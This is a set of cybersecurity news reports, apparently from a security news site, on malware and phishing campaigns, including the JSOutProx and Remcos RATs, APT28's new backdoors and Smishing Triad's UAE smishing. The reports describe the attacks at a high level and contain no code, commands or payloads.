Apr 05, 2024NewsroomCyber Espionage / Cybersecurity

Financial organizations in the Asia-Pacific (APAC) and Middle East and North Africa (MENA) are being targeted by a new version of an “evolving threat” called JSOutProx.

“JSOutProx is a sophisticated attack framework utilizing both JavaScript and .NET,” Resecurity said in a technical report published this week.

“It employs the .NET (de)serialization feature to interact with a core JavaScript module running on the victim’s machine. Once executed, the malware enables the framework to load various plugins, which conduct additional malicious activities on the target.”

First identified in December 2019 by Yoroi, early attacks distributing JSOutProx have been attributed to a threat actor tracked as Solar Spider. The operations track record of striking banks and other big companies in Asia and Europe.

In late 2021, Quick Heal Security Labs detailed attacks leveraging the remote access trojan (RAT) to single out employees of small finance banks from India. Other campaign waves have taken aim at Indian government establishments as far back as April 2020.

Attack chains are known to leverage spear-phishing emails bearing malicious JavaScript attachments masquerading as PDFs and ZIP archives containing rogue HTA files to deploy the heavily obfuscated implant.

“This malware has various plugins to perform various operations such as exfiltration of data, performing file system operations,” Quick Heal noted [PDF] at the time. “Apart from that, it also has various methods with offensive capabilities that perform various operations.”

The plugins allow it to harvest a wide range of information from the compromised host, control proxy settings, capture clipboard content, access Microsoft Outlook account details, and gather one-time passwords from Symantec VIP. A unique feature of the malware is its use of the Cookie header field for command-and-control (C2) communications.

JSOutProx also stands for the fact that it’s a fully functional RAT implemented in JavaScript.

“JavaScript simply does not offer as much flexibility as a PE file does,” Fortinet FortiGuard Labs said in a report released in December 2020, describing a campaign directed against governmental monetary and financial sectors in Asia.

“However, as JavaScript is used by many websites, it appears to most users as benign, as individuals with basic security knowledge are taught to avoid opening attachments that end in .exe. Also, because JavaScript code can be obfuscated, it easily bypasses antivirus detection, allowing it to filter through undetected.”

The latest set of attacks documented by Resecurity entails using fake SWIFT or MoneyGram payment notifications to trick email recipients into executing the malicious code. The activity is said to have witnessed a spike starting February 8, 2024.

The artifacts have been observed hosted on GitHub and GitLab repositories, which have since been blocked and taken down.

“Once the malicious code has been successfully delivered, the actor removes the repository and creates a new one,” the cybersecurity company said. “This tactic is likely related to the actor uses to manage multiple malicious payloads and differentiate targets.”

The exact origins of the e-crime group behind the malware are presently unknown, although the victimology distribution of the attacks and the sophistication of the implant alludes to them originating from China or affiliated with it, Resecurity posited.

The development comes as cyber criminals are promoting on the dark web new software called GEOBOX that repurposes Raspberry Pi devices for conducting fraud and anonymization.

Offered for only $80 per month (or $700 for a lifetime license), the tool allows the operators to spoof GPS locations, emulate specific network and software settings, mimic settings of known Wi-Fi access points, as well as bypass anti-fraud filters.

Such tools could have serious security implications as they open the door to a broad spectrum of crimes like state-sponsored attacks, corporate espionage, dark web market operations, financial fraud, anonymous distribution of malware, and even access to geofenced content.

“The ease of access to GEOBOX raises significant concerns within the cybersecurity community about its potential for widespread adoption among various threat actors,” Resecurity said.

Jan 16, 2024NewsroomBotnet / Malware

The remote access trojan (RAT) known as Remcos RAT has been found being propagated via webhards by disguising it as adult-themed games in South Korea.

WebHard, short for web hard drive, is a popular online file storage system used to upload, download, and share files in the country.

While webhards have been used in the past to deliver njRAT, UDP RAT, and DDoS botnet malware, the AhnLab Security Emergency Response Center’s (ASEC) latest analysis shows that the technique has been adopted to distribute Remcos RAT.

In these attacks, users are tricked into opening booby-trapped files by passing them off as adult games, which, when launched, execute malicious Visual Basic scripts in order to run an intermediate binary named “ffmpeg.exe.”

This results in the retrieval of Remcos RAT from an actor-controlled server.

A sophisticated RAT, Remcos (aka Remote Control and Surveillance) facilitates unauthorized remote control and surveillance of compromised hosts, enabling threat actors to exfiltrate sensitive data.

This malware, although originally marketed by Germany-based firm Breaking Security in 2016 as a bonafide remote administration tool, has metamorphosed into a potent weapon wielded by adversaries actors to infiltrate systems and establish unfettered control.

“Remcos RAT has evolved into a malicious tool employed by threat actors across various campaigns,” Cyfirma noted in an analysis in August 2023.

“The malware’s multifunctional capabilities, including keylogging, audio recording, screenshot capture, and more, highlight its potential to compromise user privacy, exfiltrate sensitive data, and manipulate systems. The RAT’s ability to disable User Account Control (UAC) and establish persistence further amplifies its potential impact.”

Dec 29, 2023NewsroomEmail Security / Malware

The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a new phishing campaign orchestrated by the Russia-linked APT28 group to deploy previously undocumented malware such as OCEANMAP, MASEPIE, and STEELHOOK to harvest sensitive information.

The activity, which was detected by the agency between December 15 and 25, 2023, targets government entities with email messages urging recipients to click on a link to view a document.

However, to the contrary, the links redirect to malicious web resources that abuse JavaScript and the “search-ms:” URI protocol handler to drop a Windows shortcut file (LNK) that launches PowerShell commands to activate an infection chain for a new malware known as MASEPIE.

MASEPIE is a Python-based tool to download/upload files and execute commands, with communications with the command-and-control (C2) server taking place over an encrypted channel using the TCP protocol.

The attacks further pave the way for the deployment of additional malware, including a PowerShell script called STEELHOOK that’s capable of harvesting web browser data and exporting it to an actor-controlled server in Base64-encoded format.

Also delivered is a C#-based backdoor dubbed OCEANMAP that’s designed to execute commands using cmd.exe.

“The IMAP protocol is used as a control channel,” CERT-UA said, adding persistence is achieved by creating a URL file named “VMSearch.url” in the Windows Startup folder.

“Commands, in Base64-encoded form, are contained in the ‘Drafts’ of the corresponding email directories; each of the drafts contains the name of the computer, the name of the user and the version of the OS. The results of the commands are stored in the inbox directory.”

The agency further pointed out that reconnaissance and lateral movement activities are carried out within an hour of the initial compromise by taking advantage of tools like Impacket and SMBExec.

The disclosure comes weeks after IBM X-Force revealed APT28’s use of lures related to the ongoing Israel-Hamas war to facilitate the delivery of a custom backdoor called HeadLace.

In recent weeks, the prolific Kremlin-backed hacking group has also been attributed to the exploitation of a now-patched critical security flaw in its Outlook email service (CVE-2023-23397, CVSS score: 9.8) to gain unauthorized access to victims’ accounts within Exchange servers.

Dec 20, 2023NewsroomIdentity Theft / SMS Phishing

The Chinese-speaking threat actors behind Smishing Triad have been observed masquerading as the United Arab Emirates Federal Authority for Identity and Citizenship to send malicious SMS messages with the ultimate goal of gathering sensitive information from residents and foreigners in the country.

“These criminals send malicious links to their victims’ mobile devices through SMS or iMessage and use URL-shortening services like Bit.ly to randomize the links they send,” Resecurity said in a report published this week. “This helps them protect the fake website’s domain and hosting location.”

Smishing Triad was first documented by the cybersecurity company in September 2023, highlighting the group’s use of compromised Apple iCloud accounts to send smishing messages for carrying out identity theft and financial fraud.

The threat actor is also known to offer ready-to-use smishing kits for sale to other cybercriminals for $200 a month, alongside engaging in Magecart-style attacks on e-commerce platforms to inject malicious code and pilfer customer data.

“This fraud-as-a-service (FaaS) model enables ‘Smishing Triad’ to scale their operations by empowering other cybercriminals to leverage their tooling and launch independent attacks,” Resecurity noted.

The latest attack wave is designed to target individuals who have recently updated their residence visas with harmful messages. The smishing campaign applies to both Android and iOS devices, with the operators likely using SMS spoofing or spam services to perpetrate the scheme.

Recipients who click on the embedded link the message are taken to a bogus, lookalike website (“rpjpapc[.]top”) impersonating the UAE Federal Authority for Identity, Citizenship, Customs and Port Security (ICP), which prompts them to enter their personal information such as names, passport numbers, mobile numbers, addresses, and card information.

What makes the campaign noteworthy is the use of a geofencing mechanism to load the phishing form only when visited from UAE-based IP addresses and mobile devices.

“The perpetrators of this act may have access to a private channel where they obtained information about UAE residents and foreigners living in or visiting the country,” Resecurity said.

“This could be achieved through third-party data breaches, business email compromises, databases purchased on the dark web, or other sources.”

Smishing Triad’s latest campaign coincides with the launch of a new underground market known as OLVX Marketplace (“olvx[.]cc”) that operates on the clear web and claims to sell tools to carry out online fraud, such as phish kits, web shells, and compromised credentials.

“While the OLVX marketplace offers thousands of individual products across numerous categories, its site administrators maintain relationships with various cybercriminals who create custom toolkits and can obtain specialized files, thereby furthering OLVX’s ability to maintain and attract customers to the platform,” ZeroFox said.

Cyber Criminals Misuse Predator Bot Detection Tool for Phishing Attacks

The disclosure comes as Trellix revealed how threat actors are leveraging Predator, an open-source tool designed to combat fraud and identify requests originating from automated systems, bots, or web crawlers, as part of various phishing campaigns.

The starting point of the attack is a phishing email sent from a previously compromised account and containing a malicious link, which, when clicked, checks if the incoming request is coming from a bot or a crawler, before redirecting to the phishing page.

The cybersecurity firm said it identified various artifacts where the threat actors repurposed the original tool by providing a list of hard-coded links as opposed to generating random links dynamically upon detecting a visitor is a bot.

“Cyber criminals are always looking for new ways to evade detection from organizations’ security products,” security researcher Vihar Shah and Rohan Shah said. “Open-source tools such as these make their task easier, as they can readily use these tools to avoid detection and more easily achieve their malicious goals.”